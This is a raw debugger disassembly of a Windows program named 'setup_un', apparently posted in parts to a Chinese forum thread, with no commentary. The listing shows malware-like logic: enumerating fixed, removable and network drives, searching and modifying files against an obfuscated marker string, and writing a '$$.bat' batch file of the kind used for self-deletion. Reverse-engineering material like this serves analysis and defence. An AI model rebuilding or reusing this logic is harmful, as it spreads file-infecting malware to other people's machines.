0040765B  |.  E8 CCD4FFFF CALL <JMP.&kernel32.FindFirstFileA>    ; \FindFirstFileA
00407660  |.  8BF0       MOV ESI,EAX
00407662  |.  8973 14    MOV DWORD PTR DS:[EBX+14],ESI
00407665  |.  83FE FF    CMP ESI,-1
00407668  |.  74 16       JE SHORT setup_un.00407680
0040766A  |.  8BC3       MOV EAX,EBX
0040766C  |.  E8 4FFFFFFF CALL setup_un.004075C0
00407671  |.  8BF0       MOV ESI,EAX
00407673  |.  85F6       TEST ESI,ESI
00407675  |.  74 10       JE SHORT setup_un.00407687
00407677  |.  8BC3       MOV EAX,EBX
00407679  |.  E8 A6FFFFFF CALL setup_un.00407624
0040767E  |.  EB 07       JMP SHORT setup_un.00407687
00407680  |>  E8 D7D4FFFF CALL <JMP.&kernel32.GetLastError>       ; [GetLastError
00407685  |.  8BF0       MOV ESI,EAX
00407687  |>  8BC6       MOV EAX,ESI
00407689  |.  5F          POP EDI
0040768A  |.  5E          POP ESI
0040768B  |.  5B          POP EBX
0040768C  \.  C3          RETN
0040768D    8D40 00    LEA EAX,DWORD PTR DS:[EAX]
00407690  /$  53          PUSH EBX
00407691  |.  8BD8       MOV EBX,EAX
00407693  |.  8D43 18    LEA EAX,DWORD PTR DS:[EBX+18]
00407696  |.  50          PUSH EAX                               ; /pFindFileData
00407697  |.  8B43 14    MOV EAX,DWORD PTR DS:[EBX+14]          ; |
0040769A  |.  50          PUSH EAX                               ; |hFile
0040769B  |.  E8 94D4FFFF CALL <JMP.&kernel32.FindNextFileA>    ; \FindNextFileA
004076A0  |.  85C0       TEST EAX,EAX
004076A2  |.  74 09       JE SHORT setup_un.004076AD
004076A4  |.  8BC3       MOV EAX,EBX
004076A6  |.  E8 15FFFFFF CALL setup_un.004075C0
004076AB  |.  5B          POP EBX
004076AC  |.  C3          RETN
004076AD  |>  E8 AAD4FFFF CALL <JMP.&kernel32.GetLastError>       ; [GetLastError
004076B2  |.  5B          POP EBX
004076B3  \.  C3          RETN
004076B4  /$  55          PUSH EBP
004076B5  |.  8BEC       MOV EBP,ESP
004076B7  |.  6A 00       PUSH 0
004076B9  |.  6A 00       PUSH 0
004076BB  |.  6A 00       PUSH 0
004076BD  |.  53          PUSH EBX
004076BE  |.  56          PUSH ESI
004076BF  |.  57          PUSH EDI
004076C0  |.  8BF8       MOV EDI,EAX
004076C2  |.  33C0       XOR EAX,EAX
004076C4  |.  55          PUSH EBP
004076C5  |.  68 44774000 PUSH setup_un.00407744
004076CA  |.  64:FF30    PUSH DWORD PTR FS:[EAX]
004076CD  |.  64:8920    MOV DWORD PTR FS:[EAX],ESP
004076D0  |.  33F6       XOR ESI,ESI
004076D2  |>  8D5E 41    /LEA EBX,DWORD PTR DS:[ESI+41]
004076D5  |.  8D45 F8    |LEA EAX,DWORD PTR SS:[EBP-8]
004076D8  |.  8BD3       |MOV EDX,EBX
004076DA  |.  E8 4DC7FFFF |CALL setup_un.00403E2C
004076DF  |.  8B55 F8    |MOV EDX,DWORD PTR SS:[EBP-8]
004076E2  |.  8D45 FC    |LEA EAX,DWORD PTR SS:[EBP-4]
004076E5  |.  B9 5C774000 |MOV ECX,setup_un.0040775C             ;  :\
004076EA  |.  E8 29C8FFFF |CALL setup_un.00403F18
004076EF  |.  8B45 FC    |MOV EAX,DWORD PTR SS:[EBP-4]
004076F2  |.  E8 D5C9FFFF |CALL setup_un.004040CC
004076F7  |.  50          |PUSH EAX                               ; /RootPathName
004076F8  |.  E8 4FD4FFFF |CALL <JMP.&kernel32.GetDriveTypeA>    ; \GetDriveTypeA
004076FD  |.  66:83F8 03 |CMP AX,3
00407701  |.  74 0C       |JE SHORT setup_un.0040770F
00407703  |.  66:83F8 04 |CMP AX,4
00407707  |.  74 06       |JE SHORT setup_un.0040770F
00407709  |.  66:83F8 02 |CMP AX,2
0040770D  |.  75 14       |JNZ SHORT setup_un.00407723
0040770F  |>  8D45 F4    |LEA EAX,DWORD PTR SS:[EBP-C]
00407712  |.  8BD3       |MOV EDX,EBX
00407714  |.  E8 13C7FFFF |CALL setup_un.00403E2C
00407719  |.  8B55 F4    |MOV EDX,DWORD PTR SS:[EBP-C]
0040771C  |.  8BC7       |MOV EAX,EDI
0040771E  |.  E8 B1C7FFFF |CALL setup_un.00403ED4
00407723  |>  46          |INC ESI
00407724  |.  83FE 1A    |CMP ESI,1A
00407727  |.^ 75 A9       \JNZ SHORT setup_un.004076D2
00407729  |.  33C0       XOR EAX,EAX
0040772B  |.  5A          POP EDX
0040772C  |.  59          POP ECX
0040772D  |.  59          POP ECX
0040772E  |.  64:8910    MOV DWORD PTR FS:[EAX],EDX
00407731  |.  68 4B774000 PUSH setup_un.0040774B
00407736  |>  8D45 F4    LEA EAX,DWORD PTR SS:[EBP-C]
00407739  |.  BA 03000000 MOV EDX,3
0040773E  |.  E8 25C5FFFF CALL setup_un.00403C68
00407743  \.  C3          RETN
00407744 .^ E9 1BBFFFFF JMP setup_un.00403664
00407749 .^ EB EB       JMP SHORT setup_un.00407736
0040774B .  5F          POP EDI
0040774C .  5E          POP ESI
0040774D .  5B          POP EBX
0040774E .  8BE5       MOV ESP,EBP
00407750 .  5D          POP EBP
00407751 .  C3          RETN
00407752    00          DB 00
00407753    00          DB 00
00407754 .  FFFFFFFF    DD FFFFFFFF
00407758 .  02000000    DD 00000002
0040775C .  3A 5C 00    ASCII ":\",0
0040775F    00          DB 00
00407760 $  55          PUSH EBP
00407761 .  8BEC       MOV EBP,ESP
00407763 .  50          PUSH EAX
00407764 .  B8 05000000 MOV EAX,5
00407769 >  81C4 04F0FFFF ADD ESP,-0FFC
0040776F .  50          PUSH EAX
00407770 .  48          DEC EAX
00407771 .^ 75 F6       JNZ SHORT setup_un.00407769
00407773 .  8B45 FC    MOV EAX,DWORD PTR SS:[EBP-4]
00407776 .  81C4 ACFEFFFF ADD ESP,-154
0040777C .  53          PUSH EBX
0040777D .  56          PUSH ESI
0040777E .  57          PUSH EDI
0040777F .  33C9       XOR ECX,ECX
00407781 .  898D A8AEFFFF MOV DWORD PTR SS:[EBP+FFFFAEA8],ECX
00407787 .  8BDA       MOV EBX,EDX
00407789 .  8945 FC    MOV DWORD PTR SS:[EBP-4],EAX
0040778C .  8B45 FC    MOV EAX,DWORD PTR SS:[EBP-4]
0040778F .  E8 28C9FFFF CALL setup_un.004040BC
00407794 .  33C0       XOR EAX,EAX
00407796 .  55          PUSH EBP
00407797 .  68 B6784000 PUSH setup_un.004078B6
0040779C .  64:FF30    PUSH DWORD PTR FS:[EAX]
0040779F .  64:8920    MOV DWORD PTR FS:[EAX],ESP
004077A2 .  33C0       XOR EAX,EAX
004077A4 .  55          PUSH EBP
004077A5 .  68 8B784000 PUSH setup_un.0040788B
004077AA .  64:FF30    PUSH DWORD PTR FS:[EAX]
004077AD .  64:8920    MOV DWORD PTR FS:[EAX],ESP
004077B0 .  33F6       XOR ESI,ESI
004077B2 .  8BC3       MOV EAX,EBX
004077B4 .  E8 8BC4FFFF CALL setup_un.00403C44
004077B9 .  8B55 FC    MOV EDX,DWORD PTR SS:[EBP-4]
004077BC .  8D85 ACFEFFFF LEA EAX,DWORD PTR SS:[EBP-154]
004077C2 .  E8 11B3FFFF CALL setup_un.00402AD8
004077C7 .  A1 BCE24000 MOV EAX,DWORD PTR DS:[40E2BC]
004077CC .  C600 00    MOV BYTE PTR DS:[EAX],0
004077CF .  BA 01000000 MOV EDX,1
004077D4 .  8D85 ACFEFFFF LEA EAX,DWORD PTR SS:[EBP-154]
004077DA .  E8 D9B6FFFF CALL setup_un.00402EB8
004077DF .  E8 30AEFFFF CALL setup_un.00402614
004077E4 .  8D85 ACFEFFFF LEA EAX,DWORD PTR SS:[EBP-154]
004077EA .  E8 39B5FFFF CALL setup_un.00402D28
004077EF .  E8 20AEFFFF CALL setup_un.00402614
004077F4 .  8BF8       MOV EDI,EAX
004077F6 .  EB 4B       JMP SHORT setup_un.00407843
004077F8 >  46          INC ESI
004077F9 .  8D45 F8    LEA EAX,DWORD PTR SS:[EBP-8]
004077FC .  50          PUSH EAX                               ; /Arg1
004077FD .  8D95 ACAEFFFF LEA EDX,DWORD PTR SS:[EBP+FFFFAEAC]    ; |
00407803 .  B9 00500000 MOV ECX,5000                            ; |
00407808 .  8D85 ACFEFFFF LEA EAX,DWORD PTR SS:[EBP-154]          ; |
0040780E .  E8 15B4FFFF CALL setup_un.00402C28                ; \setup_un.00402C28
00407813 .  E8 FCADFFFF CALL setup_un.00402614
00407818 .  8D85 A8AEFFFF LEA EAX,DWORD PTR SS:[EBP+FFFFAEA8]
0040781E .  8D95 ACAEFFFF LEA EDX,DWORD PTR SS:[EBP+FFFFAEAC]
00407824 .  B9 00500000 MOV ECX,5000
00407829 .  E8 06C5FFFF CALL setup_un.00403D34
0040782E .  8B95 A8AEFFFF MOV EDX,DWORD PTR SS:[EBP+FFFFAEA8]
00407834 .  8BC3       MOV EAX,EBX
00407836 .  E8 99C6FFFF CALL setup_un.00403ED4
0040783B .  81FE B0040000 CMP ESI,4B0
00407841 .  7F 14       JG SHORT setup_un.00407857
00407843 >  8D85 ACFEFFFF LEA EAX,DWORD PTR SS:[EBP-154]
00407849 .  E8 6EB4FFFF CALL setup_un.00402CBC
0040784E .  E8 C1ADFFFF CALL setup_un.00402614
00407853 .  84C0       TEST AL,AL
00407855 .^ 74 A1       JE SHORT setup_un.004077F8
00407857 >  8D85 ACFEFFFF LEA EAX,DWORD PTR SS:[EBP-154]
0040785D .  E8 E6B3FFFF CALL setup_un.00402C48
00407862 .  E8 ADADFFFF CALL setup_un.00402614
00407867 .  8B03       MOV EAX,DWORD PTR DS:[EBX]
00407869 .  E8 5EC6FFFF CALL setup_un.00403ECC
0040786E .  3BF8       CMP EDI,EAX
00407870 .  7D 0F       JGE SHORT setup_un.00407881
00407872 .  53          PUSH EBX
00407873 .  8B03       MOV EAX,DWORD PTR DS:[EBX]
00407875 .  8BCF       MOV ECX,EDI
00407877 .  BA 01000000 MOV EDX,1
0040787C .  E8 ABC8FFFF CALL setup_un.0040412C
00407881 >  33C0       XOR EAX,EAX
00407883 .  5A          POP EDX
00407884 .  59          POP ECX
00407885 .  59          POP ECX
00407886 .  64:8910    MOV DWORD PTR FS:[EAX],EDX
00407889 .  EB 0A       JMP SHORT setup_un.00407895
0040788B .^ E9 A8BCFFFF JMP setup_un.00403538
00407890 .  E8 5BBEFFFF CALL setup_un.004036F0
00407895 >  33C0       XOR EAX,EAX
00407897 .  5A          POP EDX
00407898 .  59          POP ECX
00407899 .  59          POP ECX
0040789A .  64:8910    MOV DWORD PTR FS:[EAX],EDX
0040789D .  68 BD784000 PUSH setup_un.004078BD
004078A2 >  8D85 A8AEFFFF LEA EAX,DWORD PTR SS:[EBP+FFFFAEA8]
004078A8 .  E8 97C3FFFF CALL setup_un.00403C44
004078AD .  8D45 FC    LEA EAX,DWORD PTR SS:[EBP-4]
004078B0 .  E8 8FC3FFFF CALL setup_un.00403C44
004078B5 .  C3          RETN
004078B6 .^ E9 A9BDFFFF JMP setup_un.00403664
004078BB .^ EB E5       JMP SHORT setup_un.004078A2
004078BD .  5F          POP EDI
004078BE .  5E          POP ESI
004078BF .  5B          POP EBX
004078C0 .  8BE5       MOV ESP,EBP
004078C2 .  5D          POP EBP
004078C3 .  C3          RETN
004078C4  /$  55          PUSH EBP
004078C5  |.  8BEC       MOV EBP,ESP
004078C7  |.  81C4 B8FEFFFF ADD ESP,-148
004078CD  |.  53          PUSH EBX
004078CE  |.  56          PUSH ESI
004078CF  |.  57          PUSH EDI
004078D0  |.  33D2       XOR EDX,EDX
004078D2  |.  8995 B8FEFFFF MOV DWORD PTR SS:[EBP-148],EDX
004078D8  |.  8995 BCFEFFFF MOV DWORD PTR SS:[EBP-144],EDX
004078DE  |.  8995 C4FEFFFF MOV DWORD PTR SS:[EBP-13C],EDX
004078E4  |.  8995 C0FEFFFF MOV DWORD PTR SS:[EBP-140],EDX
004078EA  |.  8955 F8    MOV DWORD PTR SS:[EBP-8],EDX
004078ED  |.  8955 F4    MOV DWORD PTR SS:[EBP-C],EDX
004078F0  |.  8955 F0    MOV DWORD PTR SS:[EBP-10],EDX
004078F3  |.  8945 FC    MOV DWORD PTR SS:[EBP-4],EAX
004078F6  |.  8B45 FC    MOV EAX,DWORD PTR SS:[EBP-4]
004078F9  |.  E8 BEC7FFFF CALL setup_un.004040BC
004078FE  |.  33C0       XOR EAX,EAX
00407900  |.  55          PUSH EBP
00407901  |.  68 1C7A4000 PUSH setup_un.00407A1C
00407906  |.  64:FF30    PUSH DWORD PTR FS:[EAX]
00407909  |.  64:8920    MOV DWORD PTR FS:[EAX],ESP
0040790C  |.  33DB       XOR EBX,EBX
0040790E  |.  33D2       XOR EDX,EDX
00407910  |.  B8 02000000 MOV EAX,2
00407915  |.  E8 0ED7FFFF CALL setup_un.00405028
0040791A  |.  8BF0       MOV ESI,EAX
0040791C  |.  C785 C8FEFFFF>MOV DWORD PTR SS:[EBP-138],128
00407926  |.  8D95 C8FEFFFF LEA EDX,DWORD PTR SS:[EBP-138]
0040792C  |.  8BC6       MOV EAX,ESI
0040792E  |.  E8 15D7FFFF CALL setup_un.00405048
00407933  |.  E9 AB000000 JMP setup_un.004079E3
00407938  |>  BF 04010000 /MOV EDI,104
0040793D  |.  8D85 C0FEFFFF |LEA EAX,DWORD PTR SS:[EBP-140]
00407943  |.  8D95 ECFEFFFF |LEA EDX,DWORD PTR SS:[EBP-114]
00407949  |.  B9 04010000 |MOV ECX,104
0040794E  |.  E8 61C5FFFF |CALL setup_un.00403EB4
00407953  |.  8B85 C0FEFFFF |MOV EAX,DWORD PTR SS:[EBP-140]
00407959  |.  8D95 C4FEFFFF |LEA EDX,DWORD PTR SS:[EBP-13C]
0040795F  |.  E8 E0DCFFFF |CALL setup_un.00405644
00407964  |.  8B85 C4FEFFFF |MOV EAX,DWORD PTR SS:[EBP-13C]
0040796A  |.  8D55 F8    |LEA EDX,DWORD PTR SS:[EBP-8]
0040796D  |.  E8 8EDDFFFF |CALL setup_un.00405700
00407972  |.  8D85 BCFEFFFF |LEA EAX,DWORD PTR SS:[EBP-144]
00407978  |.  50          |PUSH EAX
00407979  |.  8BCF       |MOV ECX,EDI
0040797B  |.  BA 01000000 |MOV EDX,1
00407980  |.  8B45 FC    |MOV EAX,DWORD PTR SS:[EBP-4]
00407983  |.  E8 A4C7FFFF |CALL setup_un.0040412C
00407988  |.  8B85 BCFEFFFF |MOV EAX,DWORD PTR SS:[EBP-144]
0040798E  |.  8D55 F4    |LEA EDX,DWORD PTR SS:[EBP-C]
00407991  |.  E8 6ADDFFFF |CALL setup_un.00405700
00407996  |.  8D85 B8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-148]
0040799C  |.  8D95 ECFEFFFF |LEA EDX,DWORD PTR SS:[EBP-114]
004079A2  |.  B9 04010000 |MOV ECX,104
004079A7  |.  E8 08C5FFFF |CALL setup_un.00403EB4
004079AC  |.  8B85 B8FEFFFF |MOV EAX,DWORD PTR SS:[EBP-148]
004079B2  |.  8D55 F0    |LEA EDX,DWORD PTR SS:[EBP-10]
004079B5  |.  E8 46DDFFFF |CALL setup_un.00405700
004079BA  |.  8B45 F8    |MOV EAX,DWORD PTR SS:[EBP-8]
004079BD  |.  8B55 F4    |MOV EDX,DWORD PTR SS:[EBP-C]
004079C0  |.  E8 53C6FFFF |CALL setup_un.00404018
004079C5  |.  74 0D       |JE SHORT setup_un.004079D4
004079C7  |.  8B45 F0    |MOV EAX,DWORD PTR SS:[EBP-10]
004079CA  |.  8B55 F4    |MOV EDX,DWORD PTR SS:[EBP-C]
004079CD  |.  E8 46C6FFFF |CALL setup_un.00404018
004079D2  |.  75 02       |JNZ SHORT setup_un.004079D6
004079D4  |>  B3 01       |MOV BL,1
004079D6  |>  8D95 C8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-138]
004079DC  |.  8BC6       |MOV EAX,ESI
004079DE  |.  E8 85D6FFFF |CALL setup_un.00405068
004079E3  |>  85C0          TEST EAX,EAX
004079E5  |.^ 0F85 4DFFFFFF \JNZ setup_un.00407938
004079EB  |.  56          PUSH ESI                               ; /hObject
004079EC  |.  E8 EBD0FFFF CALL <JMP.&kernel32.CloseHandle>       ; \CloseHandle
004079F1  |.  33C0       XOR EAX,EAX
004079F3  |.  5A          POP EDX
004079F4  |.  59          POP ECX
004079F5  |.  59          POP ECX
004079F6  |.  64:8910    MOV DWORD PTR FS:[EAX],EDX
004079F9  |.  68 237A4000 PUSH setup_un.00407A23
004079FE  |>  8D85 B8FEFFFF LEA EAX,DWORD PTR SS:[EBP-148]
00407A04  |.  BA 04000000 MOV EDX,4
00407A09  |.  E8 5AC2FFFF CALL setup_un.00403C68
00407A0E  |.  8D45 F0    LEA EAX,DWORD PTR SS:[EBP-10]
00407A11  |.  BA 04000000 MOV EDX,4
00407A16  |.  E8 4DC2FFFF CALL setup_un.00403C68
00407A1B  \.  C3          RETN
00407A1C .^ E9 43BCFFFF JMP setup_un.00403664
00407A21 .^ EB DB       JMP SHORT setup_un.004079FE
00407A23 .  8BC3       MOV EAX,EBX
00407A25 .  5F          POP EDI
00407A26 .  5E          POP ESI
00407A27 .  5B          POP EBX
00407A28 .  8BE5       MOV ESP,EBP
00407A2A .  5D          POP EBP
00407A2B .  C3          RETN
00407A2C  /$  55          PUSH EBP
00407A2D  |.  8BEC       MOV EBP,ESP
00407A2F  |.  81C4 A4FEFFFF ADD ESP,-15C
00407A35  |.  53          PUSH EBX
00407A36  |.  8BD8       MOV EBX,EAX
00407A38  |.  8D85 A4FEFFFF LEA EAX,DWORD PTR SS:[EBP-15C]
00407A3E  |.  8B15 A0754000 MOV EDX,DWORD PTR DS:[4075A0]          ;  setup_un.004075A4
00407A44  |.  E8 CBC9FFFF CALL setup_un.00404414
00407A49  |.  33C0       XOR EAX,EAX
00407A4B  |.  55          PUSH EBP
00407A4C  |.  68 CC7A4000 PUSH setup_un.00407ACC
00407A51  |.  64:FF30    PUSH DWORD PTR FS:[EAX]
00407A54  |.  64:8920    MOV DWORD PTR FS:[EAX],ESP
00407A57  |.  33C0       XOR EAX,EAX
00407A59  |.  55          PUSH EBP
00407A5A  |.  68 A67A4000 PUSH setup_un.00407AA6
00407A5F  |.  64:FF30    PUSH DWORD PTR FS:[EAX]
00407A62  |.  64:8920    MOV DWORD PTR FS:[EAX],ESP
00407A65  |.  8D8D A4FEFFFF LEA ECX,DWORD PTR SS:[EBP-15C]
00407A6B  |.  BA 3F000000 MOV EDX,3F
00407A70  |.  8BC3       MOV EAX,EBX
00407A72  |.  E8 C9FBFFFF CALL setup_un.00407640
00407A77  |.  85C0       TEST EAX,EAX
00407A79  |.  75 0B       JNZ SHORT setup_un.00407A86
00407A7B  |.  8B85 A8FEFFFF MOV EAX,DWORD PTR SS:[EBP-158]
00407A81  |.  8945 FC    MOV DWORD PTR SS:[EBP-4],EAX
00407A84  |.  EB 07       JMP SHORT setup_un.00407A8D
00407A86  |>  C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
00407A8D  |>  33C0       XOR EAX,EAX
00407A8F  |.  5A          POP EDX
00407A90  |.  59          POP ECX
00407A91  |.  59          POP ECX
00407A92  |.  64:8910    MOV DWORD PTR FS:[EAX],EDX
00407A95  |.  68 AD7A4000 PUSH setup_un.00407AAD
00407A9A  |>  8D85 A4FEFFFF LEA EAX,DWORD PTR SS:[EBP-15C]
00407AA0  |.  E8 7FFBFFFF CALL setup_un.00407624
00407AA5  \.  C3          RETN
00407AA6 .^ E9 B9BBFFFF JMP setup_un.00403664
00407AAB .^ EB ED       JMP SHORT setup_un.00407A9A
00407AAD .  33C0       XOR EAX,EAX
00407AAF .  5A          POP EDX
00407AB0 .  59          POP ECX
00407AB1 .  59          POP ECX
00407AB2 .  64:8910    MOV DWORD PTR FS:[EAX],EDX
00407AB5 .  68 D37A4000 PUSH setup_un.00407AD3
00407ABA >  8D85 A4FEFFFF LEA EAX,DWORD PTR SS:[EBP-15C]
00407AC0 .  8B15 A0754000 MOV EDX,DWORD PTR DS:[4075A0]          ;  setup_un.004075A4
00407AC6 .  E8 0DCAFFFF CALL setup_un.004044D8
00407ACB .  C3          RETN
00407ACC .^ E9 93BBFFFF JMP setup_un.00403664
00407AD1 .^ EB E7       JMP SHORT setup_un.00407ABA
00407AD3 .  8B45 FC    MOV EAX,DWORD PTR SS:[EBP-4]
00407AD6 .  5B          POP EBX
00407AD7 .  8BE5       MOV ESP,EBP
00407AD9 .  5D          POP EBP
00407ADA .  C3          RETN
00407ADB    90          NOP
00407ADC $  55          PUSH EBP
00407ADD .  8BEC       MOV EBP,ESP
00407ADF .  6A 00       PUSH 0
00407AE1 .  6A 00       PUSH 0
00407AE3 .  6A 00       PUSH 0
00407AE5 .  53          PUSH EBX
00407AE6 .  56          PUSH ESI
00407AE7 .  57          PUSH EDI

TOP

gaoyoo

学前班

帖子: 46
精华: 0
威望: 0 度
金币: 16 枚
最后登录: 2008-8-6

12^# 大中小发表于 2008-6-6 08:28 只看该作者

00407AE8 .  8945 FC    MOV DWORD PTR SS:[EBP-4],EAX
00407AEB .  8B45 FC    MOV EAX,DWORD PTR SS:[EBP-4]
00407AEE .  E8 C9C5FFFF CALL setup_un.004040BC
00407AF3 .  33C0       XOR EAX,EAX
00407AF5 .  55          PUSH EBP
00407AF6 .  68 EE7B4000 PUSH setup_un.00407BEE
00407AFB .  64:FF30    PUSH DWORD PTR FS:[EAX]
00407AFE .  64:8920    MOV DWORD PTR FS:[EAX],ESP
00407B01 .  8D55 F4    LEA EDX,DWORD PTR SS:[EBP-C]
00407B04 .  8B45 FC    MOV EAX,DWORD PTR SS:[EBP-4]
00407B07 .  E8 54FCFFFF CALL setup_un.00407760
00407B0C .  8D4D F8    LEA ECX,DWORD PTR SS:[EBP-8]
00407B0F .  BA 047C4000 MOV EDX,setup_un.00407C04             ;  search
00407B14 .  B8 147C4000 MOV EAX,setup_un.00407C14             ;  =nb{end'w{g>ispy>,.ps~*hsqo{*`nj+~kql)l}i#vn`}l>1'llmdis99:?.nb{end9
00407B19 .  E8 42D8FFFF CALL setup_un.00405360
00407B1E .  8B55 F4    MOV EDX,DWORD PTR SS:[EBP-C]
00407B21 .  8B45 F8    MOV EAX,DWORD PTR SS:[EBP-8]
00407B24 .  E8 8BC6FFFF CALL setup_un.004041B4
00407B29 .  85C0       TEST EAX,EAX
00407B2B .  0F85 A2000000 JNZ setup_un.00407BD3
00407B31 .  33C0       XOR EAX,EAX
00407B33 .  55          PUSH EBP
00407B34 .  68 C97B4000 PUSH setup_un.00407BC9
00407B39 .  64:FF30    PUSH DWORD PTR FS:[EAX]
00407B3C .  64:8920    MOV DWORD PTR FS:[EAX],ESP
00407B3F .  8B45 FC    MOV EAX,DWORD PTR SS:[EBP-4]
00407B42 .  E8 5DDCFFFF CALL setup_un.004057A4
00407B47 .  84C0       TEST AL,AL
00407B49 .  74 1F       JE SHORT setup_un.00407B6A
00407B4B .  BA 01000000 MOV EDX,1
00407B50 .  8B45 FC    MOV EAX,DWORD PTR SS:[EBP-4]
00407B53 .  E8 5CDCFFFF CALL setup_un.004057B4
00407B58 .  8BD8       MOV EBX,EAX
00407B5A .  B9 02000000 MOV ECX,2
00407B5F .  33D2       XOR EDX,EDX
00407B61 .  8BC3       MOV EAX,EBX
00407B63 .  E8 A4DCFFFF CALL setup_un.0040580C
00407B68 .  EB 0A       JMP SHORT setup_un.00407B74
00407B6A >  33C0       XOR EAX,EAX
00407B6C .  5A          POP EDX
00407B6D .  59          POP ECX
00407B6E .  59          POP ECX
00407B6F .  64:8910    MOV DWORD PTR FS:[EAX],EDX
00407B72 .  EB 5F       JMP SHORT setup_un.00407BD3
00407B74 >  83FB FF    CMP EBX,-1
00407B77 .  75 0A       JNZ SHORT setup_un.00407B83
00407B79 .  33C0       XOR EAX,EAX
00407B7B .  5A          POP EDX
00407B7C .  59          POP ECX
00407B7D .  59          POP ECX
00407B7E .  64:8910    MOV DWORD PTR FS:[EAX],EDX
00407B81 .  EB 50       JMP SHORT setup_un.00407BD3
00407B83 >  FF75 F8    PUSH DWORD PTR SS:[EBP-8]
00407B86 .  68 647C4000 PUSH setup_un.00407C64                ;  \n
00407B8B .  68 707C4000 PUSH setup_un.00407C70                ;  \n
00407B90 .  8D45 F8    LEA EAX,DWORD PTR SS:[EBP-8]
00407B93 .  BA 03000000 MOV EDX,3
00407B98 .  E8 EFC3FFFF CALL setup_un.00403F8C
00407B9D .  8B45 F8    MOV EAX,DWORD PTR SS:[EBP-8]
00407BA0 .  E8 27C3FFFF CALL setup_un.00403ECC
00407BA5 .  50          PUSH EAX
00407BA6 .  8D45 F8    LEA EAX,DWORD PTR SS:[EBP-8]
00407BA9 .  E8 76C5FFFF CALL setup_un.00404124
00407BAE .  8BD0       MOV EDX,EAX
00407BB0 .  8BC3       MOV EAX,EBX
00407BB2 .  59          POP ECX
00407BB3 .  E8 84DCFFFF CALL setup_un.0040583C
00407BB8 .  8BC3       MOV EAX,EBX
00407BBA .  E8 A9DCFFFF CALL setup_un.00405868
00407BBF .  33C0       XOR EAX,EAX
00407BC1 .  5A          POP EDX
00407BC2 .  59          POP ECX
00407BC3 .  59          POP ECX
00407BC4 .  64:8910    MOV DWORD PTR FS:[EAX],EDX
00407BC7 .  EB 0A       JMP SHORT setup_un.00407BD3
00407BC9 .^ E9 6AB9FFFF JMP setup_un.00403538
00407BCE .  E8 1DBBFFFF CALL setup_un.004036F0
00407BD3 >  33C0       XOR EAX,EAX
00407BD5 .  5A          POP EDX
00407BD6 .  59          POP ECX
00407BD7 .  59          POP ECX
00407BD8 .  64:8910    MOV DWORD PTR FS:[EAX],EDX
00407BDB .  68 F57B4000 PUSH setup_un.00407BF5
00407BE0 >  8D45 F4    LEA EAX,DWORD PTR SS:[EBP-C]
00407BE3 .  BA 03000000 MOV EDX,3
00407BE8 .  E8 7BC0FFFF CALL setup_un.00403C68
00407BED .  C3          RETN
00407BEE .^ E9 71BAFFFF JMP setup_un.00403664
00407BF3 .^ EB EB       JMP SHORT setup_un.00407BE0
00407BF5 .  5F          POP EDI
00407BF6 .  5E          POP ESI
00407BF7 .  5B          POP EBX
00407BF8 .  8BE5       MOV ESP,EBP
00407BFA .  5D          POP EBP
00407BFB .  C3          RETN
00407BFC .  FFFFFFFF    DD FFFFFFFF
00407C00 .  06000000    DD 00000006
00407C04 .  53 65 61 72 6>ASCII "Search",0
00407C0B    00          DB 00
00407C0C .  FFFFFFFF    DD FFFFFFFF
00407C10 .  44000000    DD 00000044
00407C14 .  3D 6E 62 7B 6>ASCII "=nb{end'w{g>ispy"
00407C24 .  3E 2C 2E 70 7>ASCII ">,.ps~*hsqo{*`nj"
00407C34 .  2B 7E 6B 71 6>ASCII "+~kql)l}i#vn`}l>"
00407C44 .  31 27 6C 6C 6>ASCII "1'llmdis99:?.nb{"
00407C54 .  65 6E 64 39 0>ASCII "end9",0
00407C59    00          DB 00
00407C5A    00          DB 00
00407C5B    00          DB 00
00407C5C .  FFFFFFFF    DD FFFFFFFF
00407C60 .  01000000    DD 00000001
00407C64 .  0D 00       ASCII "
",0
00407C66    00          DB 00
00407C67    00          DB 00
00407C68 .  FFFFFFFF    DD FFFFFFFF
00407C6C .  01000000    DD 00000001
00407C70 .  0A 00       ASCII "
",0
00407C72    00          DB 00
00407C73    00          DB 00
00407C74  /$  55          PUSH EBP
00407C75  |.  8BEC       MOV EBP,ESP
00407C77  |.  B9 41000000 MOV ECX,41
00407C7C  |>  6A 00       /PUSH 0
00407C7E  |.  6A 00       |PUSH 0
00407C80  |.  49          |DEC ECX
00407C81  |.^ 75 F9       \JNZ SHORT setup_un.00407C7C
00407C83  |.  33C0       XOR EAX,EAX
00407C85  |.  55          PUSH EBP
00407C86  |.  68 3D7F4000 PUSH setup_un.00407F3D
00407C8B  |.  64:FF30    PUSH DWORD PTR FS:[EAX]
00407C8E  |.  64:8920    MOV DWORD PTR FS:[EAX],ESP
00407C91  |.  E8 46ABFFFF CALL setup_un.004027DC
00407C96  |.  8D85 2CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1D4]
00407C9C  |.  E8 73D8FFFF CALL setup_un.00405514
00407CA1  |.  FFB5 2CFEFFFF PUSH DWORD PTR SS:[EBP-1D4]
00407CA7  |.  B8 64000000 MOV EAX,64
00407CAC  |.  E8 E3B0FFFF CALL setup_un.00402D94
00407CB1  |.  8D95 28FEFFFF LEA EDX,DWORD PTR SS:[EBP-1D8]
00407CB7  |.  E8 C0DBFFFF CALL setup_un.0040587C
00407CBC  |.  FFB5 28FEFFFF PUSH DWORD PTR SS:[EBP-1D8]
00407CC2  |.  68 507F4000 PUSH setup_un.00407F50                ;  $$.bat
00407CC7  |.  8D45 FC    LEA EAX,DWORD PTR SS:[EBP-4]
00407CCA  |.  BA 03000000 MOV EDX,3
00407CCF  |.  E8 B8C2FFFF CALL setup_un.00403F8C
00407CD4  |.  8B55 FC    MOV EDX,DWORD PTR SS:[EBP-4]
00407CD7  |.  8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]
00407CDD  |.  E8 F6ADFFFF CALL setup_un.00402AD8
00407CE2  |.  A1 BCE24000 MOV EAX,DWORD PTR DS:[40E2BC]
00407CE7  |.  C600 02    MOV BYTE PTR DS:[EAX],2
00407CEA  |.  8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]
00407CF0  |.  E8 73ABFFFF CALL setup_un.00402868
00407CF5  |.  E8 1AA9FFFF CALL setup_un.00402614
00407CFA  |.  BA 607F4000 MOV EDX,setup_un.00407F60             ;  :try1
